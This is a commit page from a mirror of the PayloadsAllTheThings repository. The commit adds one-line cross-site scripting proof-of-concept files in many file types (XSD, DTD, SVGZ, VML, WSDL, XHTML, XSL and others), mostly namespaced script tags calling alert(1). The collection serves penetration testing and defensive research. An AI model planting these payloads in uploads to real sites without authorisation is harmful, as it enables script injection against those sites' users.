mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-30 07:05:05 +00:00
XSS in several filetype based on @__Mn1__ blogpost
This commit is contained in:
parent
90b182f10f
commit
bbc9029dd6
1
XSS Injection/Files/xml.xsd
Normal file
1
XSS Injection/Files/xml.xsd
Normal file
@ -0,0 +1 @@
|
||||
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
|
1
XSS Injection/Files/xss.cer
Normal file
1
XSS Injection/Files/xss.cer
Normal file
@ -0,0 +1 @@
|
||||
<script>alert(1)</script>
|
1
XSS Injection/Files/xss.dtd
Normal file
1
XSS Injection/Files/xss.dtd
Normal file
@ -0,0 +1 @@
|
||||
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
|
1
XSS Injection/Files/xss.htm
Normal file
1
XSS Injection/Files/xss.htm
Normal file
@ -0,0 +1 @@
|
||||
<script>alert(1)</script>
|
1
XSS Injection/Files/xss.html.demo
Normal file
1
XSS Injection/Files/xss.html.demo
Normal file
@ -0,0 +1 @@
|
||||
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
|
1
XSS Injection/Files/xss.hxt
Normal file
1
XSS Injection/Files/xss.hxt
Normal file
@ -0,0 +1 @@
|
||||
<script>alert(1)</script>
|
1
XSS Injection/Files/xss.mno
Normal file
1
XSS Injection/Files/xss.mno
Normal file
@ -0,0 +1 @@
|
||||
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1337)</a:script>
|
1
XSS Injection/Files/xss.rdf
Normal file
1
XSS Injection/Files/xss.rdf
Normal file
@ -0,0 +1 @@
|
||||
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
|
1
XSS Injection/Files/xss.svgz
Normal file
1
XSS Injection/Files/xss.svgz
Normal file
@ -0,0 +1 @@
|
||||
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
|
1
XSS Injection/Files/xss.vml
Normal file
1
XSS Injection/Files/xss.vml
Normal file
@ -0,0 +1 @@
|
||||
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
|
1
XSS Injection/Files/xss.wsdl
Normal file
1
XSS Injection/Files/xss.wsdl
Normal file
@ -0,0 +1 @@
|
||||
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
|
1
XSS Injection/Files/xss.xht
Normal file
1
XSS Injection/Files/xss.xht
Normal file
@ -0,0 +1 @@
|
||||
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
|
1
XSS Injection/Files/xss.xhtml
Normal file
1
XSS Injection/Files/xss.xhtml
Normal file
@ -0,0 +1 @@
|
||||
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
|
@ -2,7 +2,7 @@
|
||||
<head></head>
|
||||
<body>
|
||||
<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
|
||||
|
||||
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(2)</a:script>
|
||||
<info>
|
||||
<name>
|
||||
<value><![CDATA[<script>confirm(document.domain)</script>]]></value>
|
1
XSS Injection/Files/xss.xsd
Normal file
1
XSS Injection/Files/xss.xsd
Normal file
@ -0,0 +1 @@
|
||||
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
|
1
XSS Injection/Files/xss.xsf
Normal file
1
XSS Injection/Files/xss.xsf
Normal file
@ -0,0 +1 @@
|
||||
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
|
1
XSS Injection/Files/xss.xsl
Normal file
1
XSS Injection/Files/xss.xsl
Normal file
@ -0,0 +1 @@
|
||||
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
|
1
XSS Injection/Files/xss.xslt
Normal file
1
XSS Injection/Files/xss.xslt
Normal file
@ -0,0 +1 @@
|
||||
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
|
Loading…
Reference in New Issue
Block a user